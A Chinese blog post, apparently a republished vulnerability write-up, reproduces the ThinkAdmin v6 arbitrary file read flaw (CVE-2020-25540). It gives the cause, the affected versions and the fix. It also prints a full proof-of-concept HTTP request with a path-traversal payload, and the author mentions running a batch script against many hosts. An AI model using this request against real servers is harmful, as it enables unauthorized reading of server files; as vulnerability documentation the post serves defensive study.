您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何進行Thinkadmin v6任意文件讀取漏洞復現,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
Thinkadmin v6任意文件讀取漏洞(CVE-2020-25540)復現
一、漏洞簡介:
ThinkAdmin是一套基于ThinkPHP框架的通用后臺管理系統,ThinkAdmin 的權限管理基于標準RBAC簡化而來,去除了繁雜的節點管理,使得權限管理起來更簡單,具體包含節點管理、權限管理、菜單管理、用戶管理。ThinkAdmin 6版本存在路徑遍歷漏洞。攻擊者可利用該漏洞通過GET請求編碼參數任意讀取遠程服務器上的文件。
二、漏洞成因:
https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php
Update.php中的函數方法未授權,可直接函數可直接調用。導致漏洞
三、影響范圍:
Thinkadmin版本小于 ≤ 2020.08.03.01
四、漏洞復現:
POC:
POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D
簡單寫了一個批量的小腳本
跑了一部分,成功的不多,HVV尾聲了,情況也正常。
發現一個詭異的地方:burp直接放包不能成功回去json的返回數據
python-嘗試python的request的post方法可以返回
嘗試curl的post的方法可以正常返回數據
下來再來研究這個問題。
五、修復方案:
目前廠商已經發布修復相關問題,請受影響用戶盡快升級到安全版本
上述內容就是如何進行Thinkadmin v6任意文件讀取漏洞復現,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。